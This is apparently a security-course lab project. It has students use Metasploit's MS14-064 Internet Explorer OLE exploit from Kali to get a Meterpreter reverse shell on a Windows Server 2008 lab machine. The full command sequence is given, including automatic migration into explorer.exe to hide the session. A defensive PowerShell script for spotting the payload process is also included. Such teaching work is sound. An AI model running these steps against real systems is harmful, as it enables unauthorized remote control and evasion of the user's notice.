http://www.rapid7.com/db/modules/exploit/windows/browser/ms14_064_ole_code_execution
Read about this attack. It's amazing--it uses a vulnerability that's been in Internet Explorer since
IE 3 on Windows 95. The Metasploit module only claims to work on Windows XP and 7, but since
it uses PowerShell, and PowerShell is included in Windows Server 2008, it works there too.
Testing Networking
Start both your Kali and Windows 2008 server machines. On your Kali machine, execute the
ifconfig command to find your IP address.
On your Windows machine, ping the Kali machine. If you don't get replies, you need to
troubleshoot your networking before proceeding.
Freeing Port 80
We plan to start a malicious server on port 80, so we need to make sure there's nothing already
listening on that port.
netstat -pant
If there's no process listening on port 80, you don't need to do anything. If port 80 is listening,
you'll see what process is listening. In the image below, apache2 is listening on port 80.
use exploit/windows/browser/ms14_064_ole_code_execution
show options
As shown below, all the options have sensible defaults--none of them require adjustment.
However, let's set the URIPATH and SRVPORT, just to make the typing easier, and to label the
screenshot with your name.
On your Kali attacker, execute these commands, replacing "YOURNAME" with your own name,
without spaces:
set URIPATH YOURNAME
set SRVPORT 80
exploit
Both the reverse handler and the Web server start, as shown below. Note the URL outlined in
green in the image below.
Opening the Malicious Web Page on the Target
On your Windows 2008 target machine, open Internet Explorer and open the URL shown by
Metasploit on your Kali machine, which contains your name.
If the page won't load, try refreshing it a couple times, or removing the :80 from the URL--that
worked for me, as shown below.
When the page loads, an "Information Bar" pop-up box will appear, as shown below. In that box,
click the Close button.
On your Kali machine, you should see a "Meterpreter session opened" message, as shown
below.
To see the "meterpreter>" prompt, execute this command:
sessions -i 1
Make sure the "Meterpreter session opened" message is visible, as shown above.
Save a whole-desktop screen capture with a filename of "Proj 14a from YOUR NAME".
Look at your Windows 2008 Server desktop. Internet Explorer is frozen, with a blank page. The
user won't tolerate that for long--within a few seconds, the user will probably close Internet
Explorer. For several common Metasploit modules, that breaks the meterpreter session.
The Meterpreter session is still working! To see why, at the "meterpreter>" prompt, execute this
command:
getpid
You see the process ID of the process Metasploit is using on the target machine, as shown
below. Your PID will be different from mine.
To see what this process is, on your Windows 2008 Server desktop, at the bottom of the screen,
right-click the taskbar and click "Task Manager", as shown below.
In Task Manager, click View, "Select Columns...". In the Select Process Page Columns box, check
"PID (Process Identifier)", as shown below.
Click OK.
In Task Manager, expand the width of the new column so you can see the PID header.
Click the PID header to sort by PID and find the PID you saw in meterpreter.
This particular exploit does not work by injecting code into the running iexplore.exe process. It
starts a new "ApacheBench Command Line" process with a name composed of random letters,
as shown below.
In Task Manager, click the ApacheBench process to select it, as shown above. At the lower right,
click the "End Process" button.
A box pops up asking "Do you want to end this process?" Click the "End process" button.
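The same check can be scripted on the target so you don't have to add columns by hand. The script below is an added example for this project, not a Metasploit or Microsoft tool; it takes the PID that "getpid" reported (the script name and the -ProcessId parameter are hypothetical), prints what Task Manager would show, and flags the two traits this exploit exposes: a file description of "ApacheBench Command Line" and an image that lives outside the Windows or Program Files directories.

```powershell
# Added triage helper (not part of the original project). Written for the
# PowerShell 2.0 that ships with Windows Server 2008, so it uses Get-WmiObject.
# Usage (hypothetical script name): .\Check-Pid.ps1 -ProcessId 1234
param([Parameter(Mandatory=$true)][int]$ProcessId)

$proc = Get-WmiObject -Class Win32_Process -Filter "ProcessId = $ProcessId"
if ($proc -eq $null) {
    Write-Host "No process with PID $ProcessId is running."
    exit 1
}

$parent = Get-WmiObject -Class Win32_Process -Filter "ProcessId = $($proc.ParentProcessId)"
$path = $proc.ExecutablePath
$description = ''
if ($path -and (Test-Path -LiteralPath $path)) {
    # FileDescription is the string Task Manager shows in its Description column
    $description = (Get-Item -LiteralPath $path).VersionInfo.FileDescription
}

Write-Host ("PID         : {0}" -f $proc.ProcessId)
Write-Host ("Name        : {0}" -f $proc.Name)
Write-Host ("Path        : {0}" -f $path)
Write-Host ("Description : {0}" -f $description)
Write-Host ("Command line: {0}" -f $proc.CommandLine)
Write-Host ("Parent      : {0} (PID {1})" -f $parent.Name, $proc.ParentProcessId)

# Two simple indicators drawn from what this lab shows in Task Manager
$flags = @()
if ($description -eq 'ApacheBench Command Line') {
    $flags += 'file description matches the random-named payload process seen in this lab'
}
if ($path -and ($path -notmatch '^[A-Za-z]:\\(Windows|Program Files)')) {
    $flags += 'image is outside the Windows and Program Files directories'
}
if ($flags.Count -eq 0) {
    Write-Host 'No flags: nothing about this process stands out by name, path or description.'
} else {
    foreach ($f in $flags) { Write-Host "FLAG: $f" }
}
```

Run it again after the session has migrated and it reports explorer.exe under C:\Windows with no flags, which is why a migrated session is much harder to spot this way.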
We need to stop the currently running Web server so we can change the malware it hands out.
jobs
You see one job running, with Id=0, as shown below.
kill 0
Automatic Migration
We want to automatically migrate the session to a normal process, so the user won't notice
anything unusual in Task Manager.
set AutoRunScript migrate -n explorer.exe
exploit
On your Windows 2008 Server machine, open Internet Explorer. Open the URL specified by
Metasploit, and close the "Information Bar" box.
A session opens, the migrate script runs, and the session automatically migrates to another
process, as shown below.
Saving the Screen Image
Make sure the "processing AutoRunScript 'migrate -n explorer.exe'" message is visible, as shown
above.
Save a whole-desktop screen capture with a filename of "Proj 14b from YOUR NAME".
On the Windows 2008 Server machine, close Internet Explorer. At the bottom of the screen,
right-click the taskbar and click "Task Manager".
In Task Manager, find the PID you saw in meterpreter. That process is "explorer.exe", as shown
below.
This is a good process to use, because it won't be closed until the user logs off.